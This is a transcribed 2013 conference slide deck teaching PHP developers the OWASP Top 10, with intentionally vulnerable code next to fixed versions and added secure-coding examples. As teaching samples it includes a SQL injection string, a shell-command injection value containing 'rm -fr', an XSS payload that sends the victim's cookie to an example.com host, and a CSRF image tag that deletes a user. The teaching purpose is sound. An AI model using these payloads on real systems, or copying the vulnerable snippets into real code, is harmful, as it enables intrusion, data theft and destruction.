Follow this topic:
@rjsmelo, #owasp, #php, #appsec
OWASP TOP 10 for PHP programmers
RICARDO MELO
Presented at #PHPLX – 11 September 2013
RICARDO MELO
● CTO @ DRI
● PHP, MySQL, Linux and lots of other OSS
● ZCE, RHCE, LPI 3, ITIL, etc.
● +10 years building (and breaking) things
About
● 14-year-old academic spin-off
● Pragmatic OSS orientation
● PHP, MySQL, SugarCRM, Drupal, JavaScript, Linux, etc.
● Crafters, integrators
● Always looking for software developers
  – Yes, right now!
1999 - 2013 DRI. Some Rights Reserved
Outline
● OWASP
● OWASP TOP 10
● What's Next
● Conclusions
What is OWASP?
● Open Web Application Security Project
● Worldwide not-for-profit
● Focus on security improvement and awareness
● Very active community
● Lots of projects (you can start yours)
What is the OWASP TOP 10?
● The full name is “The Ten Most Critical Web Application Security Risks”
● The focus is awareness
● Released in 2003, 2004, 2007, 2010 and 2013
https://www.owasp.org/index.php/Top_10_2013
Risk?
How OWASP rates each of the ten risks: threat agents and business impacts depend on your application; each of the four middle columns gets one of three ratings per risk.

Threat Agents        | Attack Vectors | Weakness Prevalence | Weakness Detectability | Technical Impacts | Business Impacts
Application specific | EASY           | WIDESPREAD          | EASY                   | SEVERE            | Application / business specific
                     | AVERAGE        | COMMON              | AVERAGE                | MODERATE          |
                     | DIFFICULT      | UNCOMMON            | DIFFICULT              | MINOR             |
OWASP TOP 10 - 2013
● A1 – Injection
● A2 – Broken Authentication and Session
Management
● A3 – Cross-site Scripting (XSS)
● A4 – Insecure Direct Object References
● A5 – Security Misconfiguration
● A6 – Sensitive Data Exposure
● A7 – Missing Function Level Access Control
● A8 – Cross Site Request Forgery (CSRF)
● A9 – Using Components with Known Vulnerabilities
● A10 – Unvalidated Redirects and Forwards
A1 - Injection
● Occurs when untrusted data is sent directly to an interpreter!
● Not only SQL: NoSQL, LDAP, OS commands, XML, XPath!
● Never, NEVER trust ANY input!
A1 – Injection Examples - SQL
<?php
// prone to SQL injection: the request value becomes part of the SQL text
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
              'username',
              'password');
$stmt = $db->query(
    "SELECT * FROM some_table limit "
    . $_REQUEST['start_record']
    . ",10");
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
// what if I set start_record = "1; delete from some_table; -- "

<?php
// script.php?start_record=20
$db = new PDO('mysql:host=localhost;dbname=testdb',
              'username',
              'password');
// the value is sent as a parameter, never as SQL text.
// LIMIT takes an integer, so bind it as one: with emulated prepares a
// string parameter would be quoted ('20') and MySQL rejects the query
$stmt = $db->prepare("SELECT * FROM some_table limit ?,10");
$stmt->bindValue(1, (int) $_REQUEST['start_record'], PDO::PARAM_INT);
$stmt->execute();
$result = $stmt->fetchAll(PDO::FETCH_ASSOC);
echo function_to_render_result($result);
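The slide binds one LIMIT value. The added example below (not from the slides) goes a step further and shows the two cases a prepared statement does not cover by itself: integer positions in LIMIT/OFFSET, which must be bound with PDO::PARAM_INT, and an ORDER BY column, which is an identifier and cannot be bound at all, so it has to come from an allowlist. The table some_table(id, name, created_at), the DSN and the allowlist are assumptions for the example.

```php
<?php
// Added example, not from the slides. Assumes a MySQL table
// some_table(id, name, created_at); the DSN and the column allowlist
// are illustrative.

declare(strict_types=1);

function connect(): PDO
{
    return new PDO(
        'mysql:host=localhost;dbname=testdb;charset=utf8mb4',
        'username',
        'password',
        [
            // real server-side prepares: parameters never touch the SQL text
            PDO::ATTR_EMULATE_PREPARES => false,
            // fail loudly instead of returning false
            PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        ]
    );
}

/**
 * Paginated, sortable listing. Every untrusted value is handled according
 * to where it lands in the statement:
 *  - LIMIT/OFFSET are integers -> cast and bind with PDO::PARAM_INT
 *  - ORDER BY is an identifier  -> cannot be bound, so pick it from an
 *    allowlist and never interpolate the raw request value
 */
function listRecords(PDO $db, array $request): array
{
    $allowedSort = ['id' => 'id', 'name' => 'name', 'date' => 'created_at'];

    $start = max(0, (int) ($request['start_record'] ?? 0));
    $size  = min(100, max(1, (int) ($request['page_size'] ?? 10)));

    $sortKey = (string) ($request['sort'] ?? 'id');
    if (!array_key_exists($sortKey, $allowedSort)) {
        $sortKey = 'id';   // unknown column: fall back, do not echo it anywhere
    }
    $dir = (($request['dir'] ?? 'asc') === 'desc') ? 'DESC' : 'ASC';

    $sql = "SELECT id, name, created_at FROM some_table"
         . " ORDER BY {$allowedSort[$sortKey]} $dir"
         . " LIMIT :size OFFSET :start";
    $stmt = $db->prepare($sql);
    $stmt->bindValue(':size',  $size,  PDO::PARAM_INT);
    $stmt->bindValue(':start', $start, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// script.php?start_record=1;delete from some_table;--&sort=name;drop table some_table
// start becomes the integer 1 and sort falls back to "id": nothing from
// the request reaches the SQL parser as text.
$rows = listRecords(connect(), $_REQUEST);
echo json_encode($rows);
```

Disabling PDO::ATTR_EMULATE_PREPARES is what makes the binding a real server-side parameter; with emulation on, PDO quotes the values client-side, which is still safe for string parameters but is exactly why an unbound LIMIT value fails.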
A1 – Injection Examples - OS
<?php
// script.php?file=xpto.pdf
$fileType = exec("file " . $_REQUEST['file']);
echo $fileType;
// but one can try with "xpto.pdf; rm -fr /some/folder"

<?php
// script.php?file=xpto.pdf
// escapeshellarg() wraps the value in single quotes as one argument, so
// ";" and other shell metacharacters are no longer interpreted.
// It does not stop path traversal ("../../etc/passwd" is still a valid
// argument): confine the value to the directory you mean to expose.
$fileType = exec("file " . escapeshellarg($_REQUEST['file']));
echo $fileType;
A2 – Broken Authentication and Session Management
● Broken implementations allow an attacker to assume another user's identity!
● Can be session hijacking / fixation
● Broken authentication
● Or other failures that lead to compromised passwords / keys / session tokens
A2 – Session Fixation
<?php
// Prone to session fixation: a session id the attacker planted in the
// victim's browser before login is still the id after login
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]

<?php
// [ ... ]
$userDetails = check_credentials($username, $password);
if ( $userDetails !== false ) {
    // new id on login; true also deletes the old session data
    session_regenerate_id(true);
    $_SESSION['userIsLoggedin'] = true;
    $_SESSION['userInformation'] = $userDetails;
}
// [ ... ]
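The slide shows the one call that defeats fixation. As an added example (not the slides' code), here is the rest of a session lifecycle that the A2 bullets imply: cookie flags that make the id harder to steal, strict mode so an id the server never issued is not adopted, regeneration on login, and a logout that actually invalidates the server-side state. check_credentials() is assumed from the slide; the site is assumed to be served over HTTPS.

```php
<?php
// Added example, not from the slides. Assumes check_credentials() as on
// the slide and a site served over HTTPS. Needs PHP >= 7.3 for the
// array form of session_set_cookie_params().

declare(strict_types=1);

function startSecureSession(): void
{
    // Cookie flags: not readable from JavaScript (limits theft through
    // XSS), only sent over TLS, and not attached to cross-site requests.
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
    // Only accept ids this server issued: an id planted by an attacker
    // that was never created here is replaced instead of adopted.
    ini_set('session.use_strict_mode', '1');
    ini_set('session.use_only_cookies', '1');
    session_start();
}

function login(string $username, string $password): bool
{
    $userDetails = check_credentials($username, $password);
    if ($userDetails === false) {
        return false;
    }
    // privilege level changed (anonymous -> authenticated): fresh id,
    // old one deleted so a pre-login id can never become a logged-in one
    session_regenerate_id(true);
    $_SESSION['userIsLoggedin']  = true;
    $_SESSION['userInformation'] = $userDetails;
    $_SESSION['loginTime']       = time();
    return true;
}

function logout(): void
{
    $_SESSION = [];
    $p = session_get_cookie_params();
    // expire the cookie in the browser ...
    setcookie(session_name(), '', time() - 42000, $p['path'], $p['domain'],
              $p['secure'], $p['httponly']);
    // ... and drop the server-side state so the id cannot be replayed
    session_destroy();
}

// Call at the top of every page that needs an authenticated user.
function requireLogin(int $maxAge = 3600): void
{
    if (empty($_SESSION['userIsLoggedin'])
        || (time() - (int) ($_SESSION['loginTime'] ?? 0)) > $maxAge) {
        logout();
        http_response_code(401);
        exit('Please log in');
    }
}

startSecureSession();
```

The absolute lifetime in requireLogin() is a simple bound on how long a stolen id stays useful; a production application would usually pair it with an idle timeout and regenerate the id again on any further privilege change.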
A3 – Cross-Site Scripting (XSS)
● Whenever untrusted data is sent to the browser without proper validation and escaping!
● XSS lets the attacker OWN the victim's browser and do ... everything the page itself could do!
● Stored, reflected and DOM-based XSS
A3 – steal user cookie
<?php
// page prone to XSS: the search term is echoed back unescaped
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
?>
<html>
<body>
<p>results for : <?= $_REQUEST['search']; ?>
<?= render_results($results); ?>
</body>
</html>
// set search to:
"<script>document.location='http://www.example.com/precious_cookie?cookie='+document.cookie</script>"

<?php
// same page, output escaped
// script.php?search=hello
$results = some_search_function($_REQUEST['search']);
// ENT_COMPAT leaves single quotes alone, which is fine for text between
// tags; use ENT_QUOTES if the value ever lands inside a quoted attribute
?>
<html>
<body>
<p>results for : <?=
htmlentities($_REQUEST['search'], ENT_COMPAT|ENT_HTML401, 'UTF-8'); ?>
<?= render_results($results); ?>
</body>
</html>
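Escaping is only correct for the context the value lands in; the one call on the slide covers text between tags. The added example below (not from the slides) reuses the search page and gives one helper per context: HTML text and attributes, a value embedded in inline JavaScript, and a URL in an href, which needs a scheme check because HTML escaping leaves javascript: URLs intact. some_search_function() and render_results() are assumed from the slide.

```php
<?php
// Added example, not from the slides: one escaping helper per output
// context. some_search_function() and render_results() are assumed
// from the slide.

declare(strict_types=1);

// Text between tags and attribute values. ENT_QUOTES also covers the
// single quote, so the same function is safe inside title='...'.
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Values embedded in inline JavaScript: json_encode produces a JS
// literal, and the HEX flags escape the characters that could close the
// <script> element or the surrounding HTML.
function js($v): string
{
    return json_encode($v, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS
                          | JSON_HEX_QUOT | JSON_THROW_ON_ERROR);
}

// href/src values: only http(s) or relative URLs, then attribute-escape.
// e() alone would pass "javascript:..." through unchanged.
function url(string $u): string
{
    $scheme = strtolower((string) parse_url($u, PHP_URL_SCHEME));
    if ($scheme !== '' && !in_array($scheme, ['http', 'https'], true)) {
        return '#';
    }
    return e($u);
}

$search  = (string) ($_REQUEST['search'] ?? '');
$results = some_search_function($search);
?>
<html>
<body>
<p title="<?= e($search) ?>">results for : <?= e($search) ?></p>
<a href="<?= url((string) ($_REQUEST['back'] ?? '/')) ?>">back</a>
<script>
  // the value arrives as a JSON string literal, not as interpolated text
  var lastSearch = <?= js($search) ?>;
</script>
<?= render_results($results) ?>
</body>
</html>
```

With the cookie-stealing payload from the slide, e() turns the angle brackets into entities and js() emits \u003c and \u003e, so the browser never sees a script element in either place.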
A4 – Insecure Direct Object References
● Whenever a developer exposes references to internal objects (ids, file names, keys) without proper access control.
● Attackers change the reference and access resources that shouldn't be accessible to them.
A4 – Access other user account
<?php
// prone to insecure direct object reference: any account id is served
// script.php?account=10
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
echo render_account_info($account);
// and if I change account to "9"?

<?php
// script.php?account=10
$user = new User($_SESSION['userInfo']);
$accountId = intval($_REQUEST['account']);
$account = new Account($accountId);
// the reference is still public; the check is what makes it safe
if ( $account->canRead($user) ) {
    echo render_account_info($account);
} else {
    echo "Access denied";
}
A5 – Security Misconfiguration
● Failing to secure the full stack often leads to the application / servers being compromised.
● Take into consideration other services / applications running on the same infrastructure
● Watch out for outdated software
● Watch out for default accounts
A6 – Sensitive Data Exposure
● Whenever sensitive data isn't properly protected, allowing attackers to steal or modify that information.
● Credit card fraud, identity theft, etc.!
● Be aware: data should be protected both in transit and in the storage engine (don't forget the backups)
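The most common sensitive data a PHP application stores is its users' passwords, and the protection that survives a leaked table or backup is a slow, salted hash. As an added example (not the slides' code), here is a check_credentials()-style routine built on password_hash()/password_verify(), available since PHP 5.5. The users table and its columns are assumed.

```php
<?php
// Added example, not from the slides. Assumes a table
// users(id, username, password_hash) and a PDO connection.

declare(strict_types=1);

const HASH_OPTIONS = ['cost' => 12];

function register(PDO $db, string $username, string $password): void
{
    // bcrypt with a per-password random salt; the cost makes offline
    // guessing slow if the table (or its backup) leaks
    $hash = password_hash($password, PASSWORD_DEFAULT, HASH_OPTIONS);
    $stmt = $db->prepare('INSERT INTO users (username, password_hash) VALUES (?, ?)');
    $stmt->execute([$username, $hash]);
}

function dummyHash(): string
{
    // computed once per process, so an unknown username costs the same
    // bcrypt work as a known one (no username enumeration by timing)
    static $hash = null;
    if ($hash === null) {
        $hash = password_hash('no-such-user', PASSWORD_DEFAULT, HASH_OPTIONS);
    }
    return $hash;
}

// Returns the user row without the hash, or false.
function checkCredentials(PDO $db, string $username, string $password)
{
    $stmt = $db->prepare('SELECT id, username, password_hash FROM users WHERE username = ?');
    $stmt->execute([$username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);

    // always run the verify, against a dummy hash if the user is unknown
    $stored = ($row === false) ? dummyHash() : $row['password_hash'];
    $valid  = password_verify($password, $stored);
    if ($row === false || !$valid) {
        return false;
    }

    // transparently upgrade hashes made with an older cost or algorithm
    if (password_needs_rehash($stored, PASSWORD_DEFAULT, HASH_OPTIONS)) {
        $upd = $db->prepare('UPDATE users SET password_hash = ? WHERE id = ?');
        $upd->execute([password_hash($password, PASSWORD_DEFAULT, HASH_OPTIONS), $row['id']]);
    }

    unset($row['password_hash']);   // never hand the hash to the rest of the app
    return $row;
}
```

The in-transit half of the bullet is handled outside the code: serve the login form and every authenticated page over HTTPS, so the password and the session cookie never cross the network in clear text.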
A7 – Missing Function Level Access Control
● Most applications validate function-level access control before displaying options in the UI, but fail to validate it when the function is actually accessed.
● An attacker can forge a request to functions that shouldn't be available to them
A7 – insecure function
<?php
// prone to insecure function access: the action runs without checking
// who asked for it
// script.php?user=john&action=read
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$user = new User($userId);
switch($action) {
    case 'read':
        echo render_user($user);
        break;
    case 'delete':
        $user->delete();
        echo "user Deleted";
        break;
}
// and if I change action to "delete"?

<?php
// every action checks the logged-in user's permission before running
$userId = $_REQUEST['user'];
$action = $_REQUEST['action'];
$loggedUser = new AppUser($_SESSION['userInfo']);
$user = new User($userId);
switch($action) {
    case 'read':
        if ( $user->canRead($loggedUser) ) {
            echo render_user($user);
        }
        break;
    case 'delete':
        if ( $user->canDelete($loggedUser) ) {
            $user->delete();
            echo "user Deleted";
        }
        break;
}
A8 – Cross Site Request Forgery (CSRF)
● CSRF forces a victim's browser to send a forged HTTP request to a vulnerable web application (normally taking advantage of an existing user session)
● To the application the forged request looks no different from a user-generated one: the browser attaches the session cookie either way!
A8 – delete user
<?php
// vulnerable app
// delete.php?id=123
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ( $user->canDelete($loggedUser) ) {
    $user->delete();
}
?>
// attacker's site: the victim's browser fetches the "image" with the
// victim's session cookie attached
<img src="http://www.example.com/users/delete.php?id=123" />

<?php
// fixed app: the request must carry a token the attacker cannot know
// (validate_token() compares it with the one stored in the session)
$id = intval($_REQUEST['id']);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if (validate_token($_REQUEST['token'])) {
    if ( $user->canDelete($loggedUser) ) {
        $user->delete();
    }
}
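The slide leaves validate_token() as a black box. The added example below (not the slides' code) implements it: a per-session random token from the CSPRNG, emitted only in the application's own HTML, compared in constant time, and required together with POST so the img-tag request from the attacker's page (a GET with no token) is rejected before any authorization logic runs. User and AppUser are the slide's classes and are assumed to exist.

```php
<?php
// Added example, not from the slides: the validate_token() the slide
// assumes, implemented with a per-session random token. User/AppUser
// are the slide's classes and are assumed to exist.

declare(strict_types=1);

session_start();

function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the CSPRNG; the attacker's page cannot read it
        // because it lives in our session and only appears in our HTML
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function validateToken(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals: constant-time comparison, no early exit on mismatch
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// Form rendering: the token goes into a hidden field, never into a URL
// (URLs end up in logs, Referer headers and browser history).
function deleteForm(int $id): string
{
    return '<form method="post" action="/users/delete.php">'
         . '<input type="hidden" name="id" value="' . $id . '">'
         . '<input type="hidden" name="token" value="' . csrfToken() . '">'
         . '<button>Delete</button></form>';
}

// delete.php: state change only over POST, only with a valid token, and
// still subject to the authorization check from the slide.
if ($_SERVER['REQUEST_METHOD'] !== 'POST' || !validateToken($_POST['token'] ?? null)) {
    http_response_code(403);
    exit('invalid request');
}
$id = (int) ($_POST['id'] ?? 0);
$user = new User($id);
$loggedUser = new AppUser($_SESSION['userInfo']);
if ($user->canDelete($loggedUser)) {
    $user->delete();
}
```

Requiring POST is not the protection on its own (an attacker's page can auto-submit a form); the token is. POST just keeps the state change out of places where GET URLs leak, and it is why the example reads the token from $_POST rather than $_REQUEST.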
A9 – Using Components with Known Vulnerabilities
● Whenever you use libraries, frameworks, or other software modules with known vulnerabilities.
● Attackers can leverage these issues to attack your application / server / etc.
A10 – Unvalidated Redirects and Forwards
● Web applications often redirect users to other pages, using untrusted data to determine the destination page.
● Attackers can redirect victims to phishing or malware pages, or use forwards to access unauthorized pages.
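The slide's code covers the forward half; the redirect half is the classic ?next= parameter after login. As an added example (not the slides' code), here is a check that keeps such a target on the site: absolute URLs must match our own host over https, and relative ones must be a plain path, which rules out protocol-relative "//evil" targets and javascript: URLs. The hostname is an assumed value.

```php
<?php
// Added example, not from the slides: a redirect target taken from the
// request (?next=...), constrained to our own site. OUR_HOST is assumed.

declare(strict_types=1);

const OUR_HOST = 'www.example.com';

/**
 * Returns a destination that is safe to put in a Location header, or
 * $fallback when the requested one would leave the site.
 */
function safeRedirectTarget(?string $next, string $fallback = '/'): string
{
    if ($next === null || $next === '') {
        return $fallback;
    }
    $parts = parse_url($next);
    if ($parts === false) {
        return $fallback;           // seriously malformed URL
    }
    // absolute URL (has a scheme or a host): only our own host over https.
    // This also rejects "javascript:..." and "data:..." targets.
    if (isset($parts['scheme']) || isset($parts['host'])) {
        if (($parts['scheme'] ?? '') !== 'https' || ($parts['host'] ?? '') !== OUR_HOST) {
            return $fallback;
        }
        return $next;
    }
    // relative URL: must be a path starting with exactly one "/".
    // "//phish.example" parses as a host and is caught above; "/\phish"
    // is treated as protocol-relative by browsers, so reject "/" followed
    // by "/" or "\" as well.
    $path = $parts['path'] ?? '';
    if ($path === '' || $path[0] !== '/' || preg_match('#^/[/\\\\]#', $path)) {
        return $fallback;
    }
    return $next;
}

// After a successful login:
//   header('Location: ' . safeRedirectTarget($_GET['next'] ?? null), true, 303);
//   exit;
```

An allowlist of known destinations (or an index into one) is stricter still and is the better choice when the set of post-login pages is small; the check above is for the case where arbitrary paths on the site must remain reachable.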
A10 – “simple” Forward
<?php
class someController extends baseController {
    public function preFunction($args, $action)
    {
        // the access check runs once, for the action that was requested
        $this->checkAccess($args, $action);
    }
    public function indexAction($args)
    {
        $response = null;
        // [...] do something here
        // prone to unvalidated forward: any method named in ?callback=
        // gets called, and that method never went through preFunction()
        if ( $args['callback'] && method_exists($this, $args['callback']) ) {
            $callback = $args['callback'];
            unset($args['callback']);
            $response = call_user_func_array(array($this, $callback), $args);
        }
        return $response;
    }
    public function destroyAction($args)
    {
        $this->selfTerminate();
    }
}
// and if I set callback to "destroyAction"?

// fix: run the access check for the forwarded action as well
if ( $args['callback'] && method_exists($this, $args['callback']) ) {
    $callback = $args['callback'];
    $this->preFunction($args, $callback);
    unset($args['callback']);
    $response = call_user_func_array(array($this, $callback), $args);
}
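The A7 slide checks permissions inside each case, and the A10 fix above re-runs the check before a forward; both rely on the developer remembering the check at every call site, and method_exists() still lets any method on the class be named. The added example below (not the slides' code) serves both slides with a single dispatcher: an explicit allowlist of actions with the role each needs, one central check that every dispatch and every forward passes through, so a callback naming destroy or a non-action method is refused before anything runs. AppUser is the slide's class; its hasRole() method, the roles and the permission map are assumptions.

```php
<?php
// Added example, not from the slides, covering the A7 function-level
// check and the A10 forward with one dispatcher. AppUser is the slide's
// class; hasRole(), the roles and the permission map are assumed.
// Needs PHP >= 8.0 (constructor property promotion).

declare(strict_types=1);

class AccessDenied extends RuntimeException {}

class UsersController
{
    // The only actions that may ever be dispatched, and the role each
    // needs. Not in this list == not reachable, whatever method_exists() says.
    private const ACTIONS = [
        'index'   => 'user',
        'read'    => 'user',
        'delete'  => 'admin',
        'destroy' => 'admin',
    ];

    public function __construct(private AppUser $loggedUser) {}

    private function checkAccess(string $action): void
    {
        if (!isset(self::ACTIONS[$action])) {
            throw new AccessDenied("unknown action $action");
        }
        if (!$this->loggedUser->hasRole(self::ACTIONS[$action])) {
            throw new AccessDenied("$action requires role " . self::ACTIONS[$action]);
        }
    }

    // Single entry point: the check is tied to the call itself, so it
    // cannot be skipped by reaching the method another way.
    public function dispatch(string $action, array $args): string
    {
        $this->checkAccess($action);
        return $this->{$action . 'Action'}($args);
    }

    // Forwards go through dispatch() too, so the target is checked again.
    private function forward(string $action, array $args): string
    {
        unset($args['callback']);
        return $this->dispatch($action, $args);
    }

    public function indexAction(array $args): string
    {
        $out = 'index';
        if (!empty($args['callback'])) {
            $out .= ' -> ' . $this->forward((string) $args['callback'], $args);
        }
        return $out;
    }

    public function readAction(array $args): string    { return 'read ' . (int) ($args['user'] ?? 0); }
    public function deleteAction(array $args): string  { return 'deleted ' . (int) ($args['user'] ?? 0); }
    public function destroyAction(array $args): string { return 'destroyed'; }
}

// script.php?user=42&action=read               checked as "read"
// script.php?action=index&callback=destroy     checked as "destroy": denied for a plain user
// script.php?action=index&callback=selfTerminate   unknown action: denied
session_start();
try {
    $controller = new UsersController(new AppUser($_SESSION['userInfo']));
    echo $controller->dispatch((string) ($_REQUEST['action'] ?? 'index'), $_REQUEST);
} catch (AccessDenied $e) {
    http_response_code(403);
    echo 'Access denied';
}
```

The design point is that authorization lives in exactly one place (dispatch) and is keyed by an allowlist rather than by what the class happens to contain; adding a new action means adding it to ACTIONS, and forgetting to do so makes it unreachable rather than unprotected.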
What's Next For PHP Programmers
● OWASP
– http://goo.gl/lVRRY
● Cheat Sheets
– http://goo.gl/lVRRY
● OWASP Zed Attack Proxy
– http://goo.gl/QE5v1H
● OWASP Books – free
– http://goo.gl/aLx1q2
Conclusions
● Keeping the application secure is a continuous process
● Avoiding the TOP 10 risks doesn't make your application secure, but it is already a HUGE step forward.
● Don't trust ANY input! Escape every output!
Thank you
Follow this topic:
@rjsmelo, #owasp, #php, #appsec
Q&A
Feedback: https://joind.in/9107
www.dri-global.com
@rjsmelo
ricardo.melo@dri-global.com

Contenu connexe

Tendances

Kubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoKubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoOpsta
 
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...apidays
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Aqua Security
 
Rest API Security
Rest API SecurityRest API Security
Rest API SecurityStormpath
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim HegazyHackIT Ukraine
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfMike Felch
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThreatConnect
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practicesSharon Vendrov
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedWill Schroeder
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesAnant Shrivastava
 
Ejercicios de HTML
Ejercicios de HTMLEjercicios de HTML
Ejercicios de HTMLAbrirllave
 
Gestion de formularios php
Gestion de formularios phpGestion de formularios php
Gestion de formularios phpwilliamCG27
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSMike Felch
 
Monitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusMonitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusGrafana Labs
 

Tendances (20)

Kubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with DemoKubernetes Secrets Management on Production with Demo
Kubernetes Secrets Management on Production with Demo
 
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
APIsecure 2023 - Approaching Multicloud API Security USing Metacloud, David L...
 
Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes Container Security Deep Dive & Kubernetes
Container Security Deep Dive & Kubernetes
 
Rest API Security
Rest API SecurityRest API Security
Rest API Security
 
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
"15 Technique to Exploit File Upload Pages", Ebrahim Hegazy
 
Fundamentos de GIt y Github
Fundamentos de GIt y GithubFundamentos de GIt y Github
Fundamentos de GIt y Github
 
Terraform
TerraformTerraform
Terraform
 
Harnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdfHarnessing the Power of AI in AWS Pentesting.pdf
Harnessing the Power of AI in AWS Pentesting.pdf
 
The Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat IntelligenceThe Diamond Model for Intrusion Analysis - Threat Intelligence
The Diamond Model for Intrusion Analysis - Threat Intelligence
 
K8s security best practices
K8s security best practicesK8s security best practices
K8s security best practices
 
DerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting RevisitedDerbyCon 2019 - Kerberoasting Revisited
DerbyCon 2019 - Kerberoasting Revisited
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
Kubernetes security
Kubernetes securityKubernetes security
Kubernetes security
 
Web api
Web apiWeb api
Web api
 
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known VulnerabilitiesUnderstanding The Known: OWASP A9 Using Components With Known Vulnerabilities
Understanding The Known: OWASP A9 Using Components With Known Vulnerabilities
 
Ejercicios de HTML
Ejercicios de HTMLEjercicios de HTML
Ejercicios de HTML
 
Gestion de formularios php
Gestion de formularios phpGestion de formularios php
Gestion de formularios php
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Welcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWSWelcome to the Jungle: Pentesting AWS
Welcome to the Jungle: Pentesting AWS
 
Monitoring Kubernetes with Prometheus
Monitoring Kubernetes with PrometheusMonitoring Kubernetes with Prometheus
Monitoring Kubernetes with Prometheus
 

Similaire à OWASP TOP 10 for PHP Programmers

Doctrine For Beginners
Doctrine For BeginnersDoctrine For Beginners
Doctrine For BeginnersJonathan Wage
 
Using Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkUsing Geeklog as a Web Application Framework
Using Geeklog as a Web Application FrameworkDirk Haun
 
Redis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationRedis & ZeroMQ: How to scale your application
Redis & ZeroMQ: How to scale your applicationrjsmelo
 
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...
CI/CD on Windows-Based Environments - Noam Shochat, eToro - DevOpsDays Tel Av...DevOpsDays Tel Aviv
 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php SecurityDave Ross
 
Create a res tful services api in php.
Create a res tful services api in php.Create a res tful services api in php.
Create a res tful services api in php.Adeoye Akintola
 
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...
Single Page Web Apps As WordPress Admin Interfaces Using AngularJS & The Word...Caldera Labs
 
Ditching JQuery
Ditching JQueryDitching JQuery
Ditching JQueryhowlowck
 
Creating REST Applications with the Slim Micro-Framework by Vikram Vaswani
